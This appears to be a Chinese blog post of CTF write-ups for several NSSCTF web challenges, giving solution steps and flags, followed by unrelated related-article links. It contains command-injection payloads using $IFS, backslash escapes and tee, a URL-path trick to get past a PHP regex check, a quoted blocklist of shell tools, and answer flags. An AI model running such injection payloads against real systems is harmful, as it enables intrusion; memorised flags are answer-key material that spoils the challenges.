NSSCTF之Web篇刷题记录(12)

简介: NSSCTF之Web篇刷题记录(12)

NSSCTF平台:https://www.nssctf.cn/

PS:记得所有的flag都改为NSSCTF

[NCTF 2018]签到题:


打开是一个search.php 查看源代码都没有找到flag,最后在index.php的响应头找到了!

NSSCTF{w3lc0m3_t0_nctf2018hhhhhhhhhhhh}



[鹤城杯 2021]EasyP:

<?php
include 'utils.php';
if (isset($_POST['guess'])) {
    $guess = (string) $_POST['guess'];
    if ($guess === $secret) {
        $message = 'Congratulations! The flag is: ' . $flag;
    } else {
        $message = 'Wrong. Try Again';
    }
}
if (preg_match('/utils\.php\/*$/i', $_SERVER['PHP_SELF'])) {
    exit("hacker :)");
}
if (preg_match('/show_source/', $_SERVER['REQUEST_URI'])){
    exit("hacker :)");
}
if (isset($_GET['show_source'])) {
    highlight_file(basename($_SERVER['PHP_SELF']));
    exit();
}else{
    show_source(__FILE__);
}
?> 


分析一下代码$_SERVE[‘PHP_SELF’] 调用的脚本的路径

$_SERVER[‘REQUEST_URI’]取得当前URI,也就是除域名外后面的完整的地址路径

basename函数: 返回路径中的文件名部分。



现在需要绕过preg_match('/utils\.php\/*$/i', $_SERVER['PHP_SELF']和正则 只要在php\后面加一个非ascll码就行比如汉字 由于preg_match正则匹配,我们不能直接输入show_source=‘’ 所以可以将show_source变为show[source

绕过preg_match正则方法是,在 index.php/utils.php后面添加一个非ascii表中的字符(很多都可以)


payload:/index.php/utils.php/巧克力?show[source=1

————————————————

6f4e6697c37c4c32a66b4ef09507f35f.png


NSSCTF{9ce4af3e-811f-49cd-a8f3-544efa897fb9}

[NSSCTF 2022 Spring Recruit]ezgame:


玩游戏65分给你flag(懒得玩)提示给的是js所以我们找一下,在js/preload.js中找到FLAG


f2acaccc9fee4107915b693e128bd65d.png

NSSCTF{c0700f5b-604f-4b8f-b017-4be822fb5de6}

[GXYCTF 2019]Ping Ping Ping:


这题之前讲过可以参考链接https://blog.csdn.net/Aluxian_/article/details/130053100?spm=1001.2014.3001.5501

Payload:?ip=127.0.0.1;cat$IFS$9`ls`



5184eda5510a4405bf48b1b5dca41161.png




1c68f39ef32d437ea237a4c9347fdc8c.png


NSSCTF{8117affa-f16d-4085-b644-696ae9b83a2c}

[SWPUCTF 2021 新生赛]finalrce:

 <?php
highlight_file(__FILE__);
if(isset($_GET['url']))
{
    $url=$_GET['url'];
    if(preg_match('/bash|nc|wget|ping|ls|cat|more|less|phpinfo|base64|echo|php|python|mv|cp|la|\-|\*|\"|\>|\<|\%|\$/i',$url))
    {
        echo "Sorry,you can't use this.";
    }
    else
    {
        echo "Can you see anything?";
        exec($url);
    }
} 


preg_match 函数用于执行一个正则表达式匹配,这里看到基本上过滤了很多命令cat,ls这种都不能使用了 可以使用tee命令

由于ls正则表达被过滤,所以我们还需要绕过preg_match 可以使用反斜杠(\)转义字符


这里的tee功能是从标准输入读取,再写入标准输出和文件 Payload:?url=l\s / |tee 1.txt 然后访问1.txt看到flllllaaaaaaggggggg



tac没有被过滤然后直接 构造Payload:?url=tac /flllll\aaaaaaggggggg | tee 9.txt (记得|后面要空格)在访问9.txt




c83299fa72424ad883d540694ad449b8.png

NSSCTF{9dccd221-4cd1-41f7-9feb-3c463839eb88}

[NISACTF 2022]checkin:


提示:尝试复制源码看看->010editor

识别到Unicode特殊字符复制到VScode中 复制下来URLencode编码一下

Payload:?ahahahaha=jitanglailo&%E2%80%AE%E2%81%A6Ugeiwo%E2%81%A9%E2%81%A6cuishiyuan=%E2%80%AE%E2%81%A6 Flag!%E2%81%A9%E2%81%A6N1SACTF



611ee0f89e0843dea57f3e71bc50591b.png



NSSCTF{5359287b-d34e-4df8-ac95-1670f011cf2c}

[UUCTF 2022 新生赛]websign:

[GDOUCTF 2023]hate eat snake:

通过即可得到flag 或者先G几次 然后点取消,等六十秒左右,再按空格就会出flag



05669df05f314b1fb792d73a95dbaeba.png



[HNCTF 2022 Week1]2048:

很经典的一个游戏了直接F12查看源代码 找到js 进去查看alert()输出复制到控制台运行即可。

8ab73ac9698c4f21b8849d1c67bbed2d.png


e2171c573cae49ceb5fa9808caae0e00.png


c5f53484df824321b8ca5a2c721ea32d.png


NSSCTF{53160c888e25c3f828b23e316a7ae083}

[HDCTF 2023]Welcome To HDCTF 2023:

正常玩游戏 G了就会给FLAG,或者去js找,找到了一个JSFuck编码解码即可。


9c224ed3c24640699111974d5410cc08.png


NSSCTF{We13ome_t@_HDCTF_2o23}

相关文章
|
1月前
|
资源调度 运维 供应链
【多微电网】计及碳排放的基于交替方向乘子法(ADMM)的多微网电能交互分布式运行策略研究附Matlab代码
​ ✅作者简介:热爱科研的Matlab仿真开发者,擅长毕业设计辅导、数学建模、数据处理、建模仿真、程序设计、完整代码获取、论文复现及科研仿真。 🍎 往期回顾关注个人主页:Matlab科研工作室 👇 关注我领取海量matlab电子书和数学建模资料 🍊个人信条:格物致知,完整Matlab代码获取及仿真咨询内容私信。 🔥 内容介绍 一、研究背景 电动汽车市场的蓬勃发展 电力系统面临的挑战 二、用户充电负荷与最优分时电价互动的意义 优化电网负荷曲线 提升用户经济效益 三、光储充换电站的关键组成部分及作用 光伏发电系统 储能系统 充电与换电设施 四、优化模型的构建思路 目
347 123
|
1月前
|
索引 Python
5个让你代码更“Pythonic”的优雅技巧
5个让你代码更“Pythonic”的优雅技巧
299 133
|
19天前
|
缓存 数据库连接 索引
五个提升Python水平的实用技巧
五个提升Python水平的实用技巧
189 134
|
1月前
|
安全 Go
五个让你的Go代码更优雅的实用技巧
五个让你的Go代码更优雅的实用技巧
275 133
|
1月前
|
PHP 索引
PHP 技巧:利用数组解包简化代码
PHP 技巧:利用数组解包简化代码
|
1月前
|
安全 数据库连接 Python
5个让Python代码更优雅的实用技巧
5个让Python代码更优雅的实用技巧
340 133
|
1月前
|
PHP
PHP技巧:让你的代码更优雅
PHP技巧:让你的代码更优雅
|
1月前
|
安全 Java
提升代码质量的五个Java实用技巧
提升代码质量的五个Java实用技巧
340 135
|
机器学习/深度学习 人工智能 自然语言处理
关于Modelscope 中文竞技场的测评体验分享
众所周知,Modelscope 中文竞技场是一款备受关注和期待的智能辅助工具,帮助用户评估和比较不同机器学习模型的性能,它为中文自然语言处理任务提供了一个全新的评测平台。在当今人工智能快速发展的时代背景下,Modelscope 中文竞技场作为一个集写作相关、代码相关和人类价值观于一体的平台,吸引了众多用户的关注。那么接下来就来分享一下Modelscope 中文竞技场的测试分享,将从写作相关、代码相关和人类价值观三个方面对 Modelscope 进行综合测评,带您深入了解这一平台的优势、特点与潜力。
1248 118
关于Modelscope 中文竞技场的测评体验分享
|
存储 算法
educoder数据结构与算法 栈 第1关:实现一个顺序存储的栈
educoder数据结构与算法 栈 第1关:实现一个顺序存储的栈
1223 120
educoder数据结构与算法 栈 第1关:实现一个顺序存储的栈